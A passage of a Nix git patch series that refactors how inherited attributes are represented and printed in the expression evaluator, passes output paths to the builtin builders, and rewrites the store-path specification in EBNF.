b/src/libexpr/eval.cc index bffbd5f1a..12d7d825f 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -1207,11 +1207,11 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v) Displacement displ = 0; for (auto & i : attrs) { Value * vAttr; - if (hasOverrides && !i.second.inherited) { + if (hasOverrides && !i.second.inherited()) { vAttr = state.allocValue(); mkThunk(*vAttr, env2, i.second.e); } else - vAttr = i.second.e->maybeThunk(state, i.second.inherited ? env : env2); + vAttr = i.second.e->maybeThunk(state, i.second.inherited() ? env : env2); env2.values[displ++] = vAttr; v.attrs->push_back(Attr(i.first, vAttr, i.second.pos)); } @@ -1282,7 +1282,7 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v) environment. */ Displacement displ = 0; for (auto & i : attrs->attrs) - env2.values[displ++] = i.second.e->maybeThunk(state, i.second.inherited ? env : env2); + env2.values[displ++] = i.second.e->maybeThunk(state, i.second.inherited() ? env : env2); auto dts = state.debugRepl ? makeDebugTraceStacker( diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 46737fea6..4c06864fd 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -82,7 +82,7 @@ void ExprAttrs::show(const SymbolTable & symbols, std::ostream & str) const return sa < sb; }); for (auto & i : sorted) { - if (i->second.inherited) + if (i->second.inherited()) str << "inherit " << symbols[i->first] << " " << "; "; else { str << symbols[i->first] << " = "; @@ -153,7 +153,7 @@ void ExprLet::show(const SymbolTable & symbols, std::ostream & str) const { str << "(let "; for (auto & i : attrs->attrs) - if (i.second.inherited) { + if (i.second.inherited()) { str << "inherit " << symbols[i.first] << "; "; } else { @@ -343,7 +343,7 @@ void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr // No need to sort newEnv since attrs is in sorted order. for (auto & i : attrs) - i.second.e->bindVars(es, i.second.inherited ? 
env : newEnv); + i.second.e->bindVars(es, i.second.inherited() ? env : newEnv); for (auto & i : dynamicAttrs) { i.nameExpr->bindVars(es, newEnv); @@ -418,7 +418,7 @@ void ExprLet::bindVars(EvalState & es, const std::shared_ptr & // No need to sort newEnv since attrs->attrs is in sorted order. for (auto & i : attrs->attrs) - i.second.e->bindVars(es, i.second.inherited ? env : newEnv); + i.second.e->bindVars(es, i.second.inherited() ? env : newEnv); if (es.debugRepl) es.exprEnvs.insert(std::make_pair(this, newEnv)); diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 1f944f10b..c8f47b02b 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -160,13 +160,24 @@ struct ExprAttrs : Expr bool recursive; PosIdx pos; struct AttrDef { - bool inherited; + enum class Kind { + /** `attr = expr;` */ + Plain, + /** `inherit attr1 attrn;` */ + Inherited, + /** `inherit (expr) attr1 attrn;` */ + InheritedFrom, + }; + + Kind kind; Expr * e; PosIdx pos; Displacement displ; // displacement - AttrDef(Expr * e, const PosIdx & pos, bool inherited=false) - : inherited(inherited), e(e), pos(pos) { }; + AttrDef(Expr * e, const PosIdx & pos, Kind kind = Kind::Plain) + : kind(kind), e(e), pos(pos) { }; AttrDef() { }; + + bool inherited() const { return kind == Kind::Inherited; } }; typedef std::map AttrDefs; AttrDefs attrs; diff --git a/src/libexpr/parser-state.hh b/src/libexpr/parser-state.hh index 87aeaeef5..ae38de130 100644 --- a/src/libexpr/parser-state.hh +++ b/src/libexpr/parser-state.hh @@ -89,7 +89,7 @@ inline void ParserState::addAttr(ExprAttrs * attrs, AttrPath && attrPath, Expr * if (i->symbol) { ExprAttrs::AttrDefs::iterator j = attrs->attrs.find(i->symbol); if (j != attrs->attrs.end()) { - if (!j->second.inherited) { + if (!j->second.inherited()) { ExprAttrs * attrs2 = dynamic_cast(j->second.e); if (!attrs2) dupAttr(attrPath, pos, j->second.pos); attrs = attrs2; diff --git a/src/libexpr/parser.y b/src/libexpr/parser.y index a3ba13c66..0898b81f7 100644 
--- a/src/libexpr/parser.y +++ b/src/libexpr/parser.y @@ -313,7 +313,9 @@ binds if ($$->attrs.find(i.symbol) != $$->attrs.end()) state->dupAttr(i.symbol, state->at(@3), $$->attrs[i.symbol].pos); auto pos = state->at(@3); - $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, true)); + $$->attrs.emplace( + i.symbol, + ExprAttrs::AttrDef(new ExprVar(CUR_POS, i.symbol), pos, ExprAttrs::AttrDef::Kind::Inherited)); } delete $3; } @@ -323,7 +325,12 @@ binds for (auto & i : *$6) { if ($$->attrs.find(i.symbol) != $$->attrs.end()) state->dupAttr(i.symbol, state->at(@6), $$->attrs[i.symbol].pos); - $$->attrs.emplace(i.symbol, ExprAttrs::AttrDef(new ExprSelect(CUR_POS, $4, i.symbol), state->at(@6))); + $$->attrs.emplace( + i.symbol, + ExprAttrs::AttrDef( + new ExprSelect(CUR_POS, $4, i.symbol), + state->at(@6), + ExprAttrs::AttrDef::Kind::InheritedFrom)); } delete $6; } From 1f542adb3e18e7078e6a589182a53a47d971748a Mon Sep 17 00:00:00 2001 From: pennae Date: Sat, 27 Jan 2024 16:33:34 +0100 Subject: [PATCH 442/654] add ExprAttrs::AttrDef::chooseByKind MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit in place of inherited() — not quite useful yet since we don't distinguish plain and inheritFrom attr kinds so far. --- src/libexpr/eval.cc | 22 +++++++++++++++------- src/libexpr/nixexpr.cc | 28 +++++++++++++++++----------- src/libexpr/nixexpr.hh | 14 ++++++++++++++ 3 files changed, 46 insertions(+), 18 deletions(-) diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc index 12d7d825f..91341e167 100644 --- a/src/libexpr/eval.cc +++ b/src/libexpr/eval.cc @@ -1209,9 +1209,9 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v) Value * vAttr; if (hasOverrides && !i.second.inherited()) { vAttr = state.allocValue(); - mkThunk(*vAttr, env2, i.second.e); + mkThunk(*vAttr, *i.second.chooseByKind(&env2, &env, &env2), i.second.e); } else - vAttr = i.second.e->maybeThunk(state, i.second.inherited() ? 
env : env2); + vAttr = i.second.e->maybeThunk(state, *i.second.chooseByKind(&env2, &env, &env2)); env2.values[displ++] = vAttr; v.attrs->push_back(Attr(i.first, vAttr, i.second.pos)); } @@ -1243,9 +1243,14 @@ void ExprAttrs::eval(EvalState & state, Env & env, Value & v) } } - else - for (auto & i : attrs) - v.attrs->push_back(Attr(i.first, i.second.e->maybeThunk(state, env), i.second.pos)); + else { + for (auto & i : attrs) { + v.attrs->push_back(Attr( + i.first, + i.second.e->maybeThunk(state, *i.second.chooseByKind(&env, &env, &env)), + i.second.pos)); + } + } /* Dynamic attrs apply *after* rec and __overrides. */ for (auto & i : dynamicAttrs) { @@ -1281,8 +1286,11 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v) while the inherited attributes are evaluated in the original environment. */ Displacement displ = 0; - for (auto & i : attrs->attrs) - env2.values[displ++] = i.second.e->maybeThunk(state, i.second.inherited() ? env : env2); + for (auto & i : attrs->attrs) { + env2.values[displ++] = i.second.e->maybeThunk( + state, + *i.second.chooseByKind(&env2, &env, &env2)); + } auto dts = state.debugRepl ? makeDebugTraceStacker( diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index 4c06864fd..f967777f2 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -334,16 +334,19 @@ void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr es.exprEnvs.insert(std::make_pair(this, env)); if (recursive) { - auto newEnv = std::make_shared(nullptr, env.get(), recursive ? attrs.size() : 0); + auto newEnv = [&] () -> std::shared_ptr { + auto newEnv = std::make_shared(nullptr, env.get(), attrs.size()); - Displacement displ = 0; - for (auto & i : attrs) - newEnv->vars.emplace_back(i.first, i.second.displ = displ++); + Displacement displ = 0; + for (auto & i : attrs) + newEnv->vars.emplace_back(i.first, i.second.displ = displ++); + return newEnv; + }(); // No need to sort newEnv since attrs is in sorted order. 
for (auto & i : attrs) - i.second.e->bindVars(es, i.second.inherited() ? env : newEnv); + i.second.e->bindVars(es, i.second.chooseByKind(newEnv, env, newEnv)); for (auto & i : dynamicAttrs) { i.nameExpr->bindVars(es, newEnv); @@ -352,7 +355,7 @@ void ExprAttrs::bindVars(EvalState & es, const std::shared_ptr } else { for (auto & i : attrs) - i.second.e->bindVars(es, env); + i.second.e->bindVars(es, i.second.chooseByKind(env, env, env)); for (auto & i : dynamicAttrs) { i.nameExpr->bindVars(es, env); @@ -409,16 +412,19 @@ void ExprCall::bindVars(EvalState & es, const std::shared_ptr & void ExprLet::bindVars(EvalState & es, const std::shared_ptr & env) { - auto newEnv = std::make_shared(nullptr, env.get(), attrs->attrs.size()); + auto newEnv = [&] () -> std::shared_ptr { + auto newEnv = std::make_shared(nullptr, env.get(), attrs->attrs.size()); - Displacement displ = 0; - for (auto & i : attrs->attrs) - newEnv->vars.emplace_back(i.first, i.second.displ = displ++); + Displacement displ = 0; + for (auto & i : attrs->attrs) + newEnv->vars.emplace_back(i.first, i.second.displ = displ++); + return newEnv; + }(); // No need to sort newEnv since attrs->attrs is in sorted order. for (auto & i : attrs->attrs) - i.second.e->bindVars(es, i.second.inherited() ? 
env : newEnv); + i.second.e->bindVars(es, i.second.chooseByKind(newEnv, env, newEnv)); if (es.debugRepl) es.exprEnvs.insert(std::make_pair(this, newEnv)); diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index c8f47b02b..2d8dafe44 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -178,6 +178,20 @@ struct ExprAttrs : Expr AttrDef() { }; bool inherited() const { return kind == Kind::Inherited; } + + template + const T & chooseByKind(const T & plain, const T & inherited, const T & inheritedFrom) const + { + switch (kind) { + case Kind::Plain: + return plain; + case Kind::Inherited: + return inherited; + default: + case Kind::InheritedFrom: + return inheritedFrom; + } + } }; typedef std::map AttrDefs; AttrDefs attrs; From 6c08fba533ef31cad2bdc03ba72ecf58dc8ee5a0 Mon Sep 17 00:00:00 2001 From: pennae Date: Sat, 27 Jan 2024 16:33:34 +0100 Subject: [PATCH 443/654] use the same bindings print for ExprAttrs and ExprLet this also has the effect of sorting let bindings lexicographically rather than by symbol creation order as was previously done, giving a better canonicalization in the process. --- src/libexpr/nixexpr.cc | 21 ++++++++----------- src/libexpr/nixexpr.hh | 2 ++ tests/functional/lang/parse-okay-inherits.exp | 2 +- 3 files changed, 12 insertions(+), 13 deletions(-) diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index f967777f2..c0812bb30 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -70,10 +70,8 @@ void ExprOpHasAttr::show(const SymbolTable & symbols, std::ostream & str) const str << ") ? 
" << showAttrPath(symbols, attrPath) << ")"; } -void ExprAttrs::show(const SymbolTable & symbols, std::ostream & str) const +void ExprAttrs::showBindings(const SymbolTable & symbols, std::ostream & str) const { - if (recursive) str << "rec "; - str << "{ "; typedef const decltype(attrs)::value_type * Attr; std::vector sorted; for (auto & i : attrs) sorted.push_back(&i); @@ -97,6 +95,13 @@ void ExprAttrs::show(const SymbolTable & symbols, std::ostream & str) const i.valueExpr->show(symbols, str); str << "; "; } +} + +void ExprAttrs::show(const SymbolTable & symbols, std::ostream & str) const +{ + if (recursive) str << "rec "; + str << "{ "; + showBindings(symbols, str); str << "}"; } @@ -152,15 +157,7 @@ void ExprCall::show(const SymbolTable & symbols, std::ostream & str) const void ExprLet::show(const SymbolTable & symbols, std::ostream & str) const { str << "(let "; - for (auto & i : attrs->attrs) - if (i.second.inherited()) { - str << "inherit " << symbols[i.first] << "; "; - } - else { - str << symbols[i.first] << " = "; - i.second.e->show(symbols, str); - str << "; "; - } + attrs->showBindings(symbols, str); str << "in "; body->show(symbols, str); str << ")"; diff --git a/src/libexpr/nixexpr.hh b/src/libexpr/nixexpr.hh index 2d8dafe44..4a93143b4 100644 --- a/src/libexpr/nixexpr.hh +++ b/src/libexpr/nixexpr.hh @@ -207,6 +207,8 @@ struct ExprAttrs : Expr ExprAttrs() : recursive(false) { }; PosIdx getPos() const override { return pos; } COMMON_METHODS + + void showBindings(const SymbolTable & symbols, std::ostream & str) const; }; struct ExprList : Expr diff --git a/tests/functional/lang/parse-okay-inherits.exp b/tests/functional/lang/parse-okay-inherits.exp index 050b54afd..722101ceb 100644 --- a/tests/functional/lang/parse-okay-inherits.exp +++ b/tests/functional/lang/parse-okay-inherits.exp @@ -1 +1 @@ -(let c = { }; b = 2; in { a = 1; inherit b ; d = (c).d; e = (c).e; f = 3; }) +(let b = 2; c = { }; in { a = 1; inherit b ; d = (c).d; e = (c).e; f = 3; }) From 
ecf8b12d60ad2929f9998666cf0966475b91e291 Mon Sep 17 00:00:00 2001 From: pennae Date: Sat, 27 Jan 2024 16:33:34 +0100 Subject: [PATCH 444/654] group inherit by source during Expr::show for plain inherits this is really just a stylistic choice, but for inherit-from it actually fixes an exponential size increase problem during expr printing (as may happen during assertion failure reporting, on during duplicate attr detection in the parser) --- src/libexpr/nixexpr.cc | 32 +++++++++++++++++-- tests/functional/lang/parse-okay-inherits.exp | 2 +- .../functional/lang/parse-okay-subversion.exp | 2 +- 3 files changed, 31 insertions(+), 5 deletions(-) diff --git a/src/libexpr/nixexpr.cc b/src/libexpr/nixexpr.cc index c0812bb30..82e69de51 100644 --- a/src/libexpr/nixexpr.cc +++ b/src/libexpr/nixexpr.cc @@ -79,10 +79,36 @@ void ExprAttrs::showBindings(const SymbolTable & symbols, std::ostream & str) co std::string_view sa = symbols[a->first], sb = symbols[b->first]; return sa < sb; }); + std::vector inherits; + std::map> inheritsFrom; for (auto & i : sorted) { - if (i->second.inherited()) - str << "inherit " << symbols[i->first] << " " << "; "; - else { + switch (i->second.kind) { + case AttrDef::Kind::Plain: + break; + case AttrDef::Kind::Inherited: + inherits.push_back(i->first); + break; + case AttrDef::Kind::InheritedFrom: { + auto & select = dynamic_cast(*i->second.e); + inheritsFrom[select.e].push_back(i->first); + break; + } + } + } + if (!inherits.empty()) { + str << "inherit"; + for (auto sym : inherits) str << " " << symbols[sym]; + str << "; "; + } + for (const auto & [from, syms] : inheritsFrom) { + str << "inherit ("; + from->show(symbols, str); + str << ")"; + for (auto sym : syms) str << " " << symbols[sym]; + str << "; "; + } + for (auto & i : sorted) { + if (i->second.kind == AttrDef::Kind::Plain) { str << symbols[i->first] << " = "; i->second.e->show(symbols, str); str << "; "; diff --git a/tests/functional/lang/parse-okay-inherits.exp 
b/tests/functional/lang/parse-okay-inherits.exp index 722101ceb..1355527e6 100644 --- a/tests/functional/lang/parse-okay-inherits.exp +++ b/tests/functional/lang/parse-okay-inherits.exp @@ -1 +1 @@ -(let b = 2; c = { }; in { a = 1; inherit b ; d = (c).d; e = (c).e; f = 3; }) +(let b = 2; c = { }; in { inherit b; inherit (c) d e; a = 1; f = 3; }) diff --git a/tests/functional/lang/parse-okay-subversion.exp b/tests/functional/lang/parse-okay-subversion.exp index 4168ee8bf..2303932c4 100644 --- a/tests/functional/lang/parse-okay-subversion.exp +++ b/tests/functional/lang/parse-okay-subversion.exp @@ -1 +1 @@ -({ fetchurl, localServer ? false, httpServer ? false, sslSupport ? false, pythonBindings ? false, javaSwigBindings ? false, javahlBindings ? false, stdenv, openssl ? null, httpd ? null, db4 ? null, expat, swig ? null, j2sdk ? null }: assert (expat != null); assert (localServer -> (db4 != null)); assert (httpServer -> ((httpd != null) && ((httpd).expat == expat))); assert (sslSupport -> ((openssl != null) && (httpServer -> ((httpd).openssl == openssl)))); assert (pythonBindings -> ((swig != null) && (swig).pythonSupport)); assert (javaSwigBindings -> ((swig != null) && (swig).javaSupport)); assert (javahlBindings -> (j2sdk != null)); ((stdenv).mkDerivation { builder = /foo/bar; db4 = (if localServer then db4 else null); inherit expat ; inherit httpServer ; httpd = (if httpServer then httpd else null); j2sdk = (if javaSwigBindings then (swig).j2sdk else (if javahlBindings then j2sdk else null)); inherit javaSwigBindings ; inherit javahlBindings ; inherit localServer ; name = "subversion-1.1.1"; openssl = (if sslSupport then openssl else null); patches = (if javahlBindings then [ (/javahl.patch) ] else [ ]); python = (if pythonBindings then (swig).python else null); inherit pythonBindings ; src = (fetchurl { md5 = "a180c3fe91680389c210c99def54d9e0"; url = "http://subversion.tigris.org/tarballs/subversion-1.1.1.tar.bz2"; }); inherit sslSupport ; swig = (if 
(pythonBindings || javaSwigBindings) then swig else null); })) +({ fetchurl, localServer ? false, httpServer ? false, sslSupport ? false, pythonBindings ? false, javaSwigBindings ? false, javahlBindings ? false, stdenv, openssl ? null, httpd ? null, db4 ? null, expat, swig ? null, j2sdk ? null }: assert (expat != null); assert (localServer -> (db4 != null)); assert (httpServer -> ((httpd != null) && ((httpd).expat == expat))); assert (sslSupport -> ((openssl != null) && (httpServer -> ((httpd).openssl == openssl)))); assert (pythonBindings -> ((swig != null) && (swig).pythonSupport)); assert (javaSwigBindings -> ((swig != null) && (swig).javaSupport)); assert (javahlBindings -> (j2sdk != null)); ((stdenv).mkDerivation { inherit expat httpServer javaSwigBindings javahlBindings localServer pythonBindings sslSupport; builder = /foo/bar; db4 = (if localServer then db4 else null); httpd = (if httpServer then httpd else null); j2sdk = (if javaSwigBindings then (swig).j2sdk else (if javahlBindings then j2sdk else null)); name = "subversion-1.1.1"; openssl = (if sslSupport then openssl else null); patches = (if javahlBindings then [ (/javahl.patch) ] else [ ]); python = (if pythonBindings then (swig).python else null); src = (fetchurl { md5 = "a180c3fe91680389c210c99def54d9e0"; url = "http://subversion.tigris.org/tarballs/subversion-1.1.1.tar.bz2"; }); swig = (if (pythonBindings || javaSwigBindings) then swig else null); })) From 619ca631d07218dfe04bb53e5abb855ecf2bb67a Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 12 Feb 2024 15:29:48 +0100 Subject: [PATCH 445/654] Fix "may be used uninitialized" warning --- src/libstore/store-api.cc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index 439c9530c..e3715343e 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -847,7 +847,7 @@ void Store::substitutePaths(const StorePathSet & paths) if (!willSubstitute.empty()) try { 
std::vector subs; - for (auto & p : willSubstitute) subs.push_back(DerivedPath::Opaque{p}); + for (auto & p : willSubstitute) subs.emplace_back(DerivedPath::Opaque{p}); buildPaths(subs); } catch (Error & e) { logWarning(e.info()); From a9b69b2fff8b33bc62234f8031f9acf257d9fbe0 Mon Sep 17 00:00:00 2001 From: Eelco Dolstra Date: Mon, 12 Feb 2024 16:34:59 +0100 Subject: [PATCH 446/654] builtin:{unpack-channel,buildenv}: Get output path from the derivation Similar to 1ee42c5b88eb0533ebcf8b2579ec82f2be80e4b2, get the "out" path from the derivation (and complain if it doesn't exist), rather than getting it from the environment. --- src/libstore/build/local-derivation-goal.cc | 13 +++++++------ src/libstore/build/local-derivation-goal.hh | 2 +- src/libstore/builtins.hh | 10 ++++++++-- src/libstore/builtins/buildenv.cc | 6 ++++-- src/libstore/builtins/buildenv.hh | 4 +++- src/libstore/builtins/fetchurl.cc | 15 ++++++--------- src/libstore/builtins/unpack-channel.cc | 6 ++++-- 7 files changed, 33 insertions(+), 23 deletions(-) diff --git a/src/libstore/build/local-derivation-goal.cc b/src/libstore/build/local-derivation-goal.cc index 2f60d2f38..b373c74b2 100644 --- a/src/libstore/build/local-derivation-goal.cc +++ b/src/libstore/build/local-derivation-goal.cc @@ -2130,16 +2130,17 @@ void LocalDerivationGoal::runChild() try { logger = makeJSONLogger(*logger); - BasicDerivation & drv2(*drv); - for (auto & e : drv2.env) - e.second = rewriteStrings(e.second, inputRewrites); + std::map outputs; + for (auto & e : drv->outputs) + outputs.insert_or_assign(e.first, + worker.store.printStorePath(scratchOutputs.at(e.first))); if (drv->builder == "builtin:fetchurl") - builtinFetchurl(drv2, netrcData); + builtinFetchurl(*drv, outputs, netrcData); else if (drv->builder == "builtin:buildenv") - builtinBuildenv(drv2); + builtinBuildenv(*drv, outputs); else if (drv->builder == "builtin:unpack-channel") - builtinUnpackChannel(drv2); + builtinUnpackChannel(*drv, outputs); else throw 
Error("unsupported builtin builder '%1%'", drv->builder.substr(8)); _exit(0); diff --git a/src/libstore/build/local-derivation-goal.hh b/src/libstore/build/local-derivation-goal.hh index 88152a645..f25cb9424 100644 --- a/src/libstore/build/local-derivation-goal.hh +++ b/src/libstore/build/local-derivation-goal.hh @@ -106,7 +106,7 @@ struct LocalDerivationGoal : public DerivationGoal RedirectedOutputs redirectedOutputs; /** - * The outputs paths used during the build. + * The output paths used during the build. * * - Input-addressed derivations or fixed content-addressed outputs are * sometimes built when some of their outputs already exist, and can not diff --git a/src/libstore/builtins.hh b/src/libstore/builtins.hh index d201fb3ac..93558b49e 100644 --- a/src/libstore/builtins.hh +++ b/src/libstore/builtins.hh @@ -6,7 +6,13 @@ namespace nix { // TODO: make pluggable. -void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData); -void builtinUnpackChannel(const BasicDerivation & drv); +void builtinFetchurl( + const BasicDerivation & drv, + const std::map & outputs, + const std::string & netrcData); + +void builtinUnpackChannel( + const BasicDerivation & drv, + const std::map & outputs); } diff --git a/src/libstore/builtins/buildenv.cc b/src/libstore/builtins/buildenv.cc index 9283251ac..1ed7b39cc 100644 --- a/src/libstore/builtins/buildenv.cc +++ b/src/libstore/builtins/buildenv.cc @@ -161,7 +161,9 @@ void buildProfile(const Path & out, Packages && pkgs) debug("created %d symlinks in user environment", state.symlinks); } -void builtinBuildenv(const BasicDerivation & drv) +void builtinBuildenv( + const BasicDerivation & drv, + const std::map & outputs) { auto getAttr = [&](const std::string & name) { auto i = drv.env.find(name); @@ -169,7 +171,7 @@ void builtinBuildenv(const BasicDerivation & drv) return i->second; }; - Path out = getAttr("out"); + auto out = outputs.at("out"); createDirs(out); /* Convert the stuff we get from the environment 
back into a diff --git a/src/libstore/builtins/buildenv.hh b/src/libstore/builtins/buildenv.hh index b24633e27..8e112e176 100644 --- a/src/libstore/builtins/buildenv.hh +++ b/src/libstore/builtins/buildenv.hh @@ -45,6 +45,8 @@ typedef std::vector Packages; void buildProfile(const Path & out, Packages && pkgs); -void builtinBuildenv(const BasicDerivation & drv); +void builtinBuildenv( + const BasicDerivation & drv, + const std::map & outputs); } diff --git a/src/libstore/builtins/fetchurl.cc b/src/libstore/builtins/fetchurl.cc index a9f2e748e..4fb67f933 100644 --- a/src/libstore/builtins/fetchurl.cc +++ b/src/libstore/builtins/fetchurl.cc @@ -6,7 +6,10 @@ namespace nix { -void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData) +void builtinFetchurl( + const BasicDerivation & drv, + const std::map & outputs, + const std::string & netrcData) { /* Make the host's netrc data available. Too bad curl requires this to be stored in a file. It would be nice if we could just @@ -24,14 +27,8 @@ void builtinFetchurl(const BasicDerivation & drv, const std::string & netrcData) if (!dof) throw Error("'builtin:fetchurl' must be a fixed-output derivation"); - auto getAttr = [&](const std::string & name) { - auto i = drv.env.find(name); - if (i == drv.env.end()) throw Error("attribute '%s' missing", name); - return i->second; - }; - - Path storePath = getAttr("out"); - auto mainUrl = getAttr("url"); + auto storePath = outputs.at("out"); + auto mainUrl = drv.env.at("url"); bool unpack = getOr(drv.env, "unpack", "") == "1"; /* Note: have to use a fresh fileTransfer here because we're in diff --git a/src/libstore/builtins/unpack-channel.cc b/src/libstore/builtins/unpack-channel.cc index ba04bb16c..6f68d4c0b 100644 --- a/src/libstore/builtins/unpack-channel.cc +++ b/src/libstore/builtins/unpack-channel.cc @@ -3,7 +3,9 @@ namespace nix { -void builtinUnpackChannel(const BasicDerivation & drv) +void builtinUnpackChannel( + const BasicDerivation & drv, + const 
std::map & outputs) { auto getAttr = [&](const std::string & name) { auto i = drv.env.find(name); @@ -11,7 +13,7 @@ void builtinUnpackChannel(const BasicDerivation & drv) return i->second; }; - Path out = getAttr("out"); + auto out = outputs.at("out"); auto channelName = getAttr("channelName"); auto src = getAttr("src"); From 91557df4a78e47fdadcea59fbca7751511b73bf5 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 12 Feb 2024 11:16:12 -0500 Subject: [PATCH 447/654] Apply suggestions from code review Co-authored-by: Robert Hensing --- doc/manual/src/SUMMARY.md.in | 2 +- doc/manual/src/protocols/store-path.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/doc/manual/src/SUMMARY.md.in b/doc/manual/src/SUMMARY.md.in index e6390c60a..d86372845 100644 --- a/doc/manual/src/SUMMARY.md.in +++ b/doc/manual/src/SUMMARY.md.in @@ -106,7 +106,7 @@ - [Architecture and Design](architecture/architecture.md) - [Protocols](protocols/index.md) - [Serving Tarball Flakes](protocols/tarball-fetcher.md) - - [Exact Store Path Specification](protocols/store-path.md) + - [Store Path Specification](protocols/store-path.md) - [Derivation "ATerm" file format](protocols/derivation-aterm.md) - [Glossary](glossary.md) - [Contributing](contributing/index.md) diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md index d1c35b05e..e7bc050e7 100644 --- a/doc/manual/src/protocols/store-path.md +++ b/doc/manual/src/protocols/store-path.md @@ -47,7 +47,7 @@ where For either the outputs built from derivations, paths copied to the store hashed that area single file hashed directly, or the via a hash algorithm other than [SHA-256][sha-256]. - (in that case "source" is used; it's silly, but it's done that way for compatibility). + (in that case "source" is used; this is only necessary for compatibility). `` is the name of the output (usually, "out"). For content-addressed store objects, ``, is always "out". 
From ac1301ddfdc0d92a23378f2ea75b221740c15bab Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 12 Feb 2024 11:16:53 -0500 Subject: [PATCH 448/654] Convert store path "grammar" to EBNF --- doc/manual/src/protocols/store-path.md | 70 +++++++++++++++----------- 1 file changed, 40 insertions(+), 30 deletions(-) diff --git a/doc/manual/src/protocols/store-path.md b/doc/manual/src/protocols/store-path.md index e7bc050e7..d5dec77b5 100644 --- a/doc/manual/src/protocols/store-path.md +++ b/doc/manual/src/protocols/store-path.md @@ -5,66 +5,69 @@ This is the complete specification for how store paths are calculated. Regular users do *not* need to know this information --- store paths can be treated as black boxes computed from the properties of the store objects they refer to. But for those interested in exactly how Nix works, e.g. if they are reimplementing it, this information can be useful. -```bnf - ::= /- +```ebnf +store-path = store-dir "/" digest "-" name ``` where -- `` = base-32 representation of the first 160 bits of a [SHA-256] hash of `
`
+- `digest` = base-32 representation of the first 160 bits of a [SHA-256] hash of `pre`
 
   Th is :the hash part of the store name
 
-- `
` = the string `:sha256:::`;
+- `pre` = the string
+
+  ```ebnf
+  type ":" sha256 ":" inner-digest ":" store ":" name
+  ```
 
   Note that it includes the location of the store as well as the name to make sure that changes to either of those are reflected in the hash
   (e.g. you won't get `/nix/store/-name1` and `/nix/store/-name2`, or `/gnu/store/-name1`, with equal hash parts).
 
-- `` = the name of the store object.
+- `name` = the name of the store object.
 
-- `` = the [store directory](@docroot@/store/store-path.md#store-directory)
+- `store` = the [store directory](@docroot@/store/store-path.md#store-directory)
 
-- `` = one of:
+- `type` = one of:
 
-  - ```bnf
-    text:::...
+  - ```ebnf
+    "text" ( ":" store-path )*
     ```
 
     for encoded derivations written to the store.
-    ` ... ` are the store paths referenced by this path.
-    Those are encoded in the form described by ``.
+    The optional trailing store paths are the references of the store object.
 
-  - ```bnf
-    source:::...::self
+  - ```ebnf
+    "source" ( ":" store-path )*
     ```
 
     For paths copied to the store and hashed via a [Nix Archive (NAR)] and [SHA-256][sha-256].
     Just like in the text case, we can have the store objects referenced by their paths.
     Additionally, we can have an optional `:self` label to denote self reference.
 
-  - ```bnf
-    output:
+  - ```ebnf
+    "output:" id
     ```
 
     For either the outputs built from derivations,
     paths copied to the store hashed that area single file hashed directly, or the via a hash algorithm other than [SHA-256][sha-256].
     (in that case "source" is used; this is only necessary for compatibility).
 
-    `` is the name of the output (usually, "out").
-    For content-addressed store objects, ``, is always "out".
+    `id` is the name of the output (usually, "out").
+    For content-addressed store objects, `id`, is always "out".
 
-- `` = base-16 representation of a SHA-256 hash of ``
+- `inner-digest` = base-16 representation of a SHA-256 hash of `inner-pre`
 
-- `` = one of the following based on ``:
+- `inner-pre` = one of the following based on `type`:
 
-  - if `` = `text:...`:
+  - if `type` = `"text:" ...`:
 
     the string written to the resulting store path.
 
-  - if `` = `source:...`:
+  - if `type` = `"source:" ...`:
 
     the the hash of the [Nix Archive (NAR)] serialization of the [file system object](@docroot@/store/file-system-object.md) of the store object.
 
-  - if `` = `output:`:
+  - if `type` = `"output:" id`:
 
     - For input-addressed derivation outputs:
 
@@ -72,31 +75,38 @@ where
 
     - For content-addressed store paths:
 
-      the string `fixed:out:::`, where
+      the string
 
-      - `` = one of:
+      ```ebnf
+      "fixed:out:" rec algo ":" hash ":"
+      ```
+
+      where
+
+      - `rec` = one of:
 
         - `r:` hashes of the for [Nix Archive (NAR)] (arbitrary file system object) serialization
 
         - `` (empty string) for hashes of the flat (single file) serialization
 
-      - `` = `md5`, `sha1` or `sha256`
+      - `algo` = `md5`, `sha1` or `sha256`
 
-      - `` = base-16 representation of the path or flat hash of the contents of the path (or expected contents of the path for fixed-output derivations).
+      - `hash` = base-16 representation of the path or flat hash of the contents of the path (or expected contents of the path for fixed-output derivations).
 
-      Note that `` = `out`, regardless of the name part of the store path.
-      Also note that NAR + SHA-256 must not use this case, and instead must use the `` = `source:...` case.
+      Note that `id` = `out`, regardless of the name part of the store path.
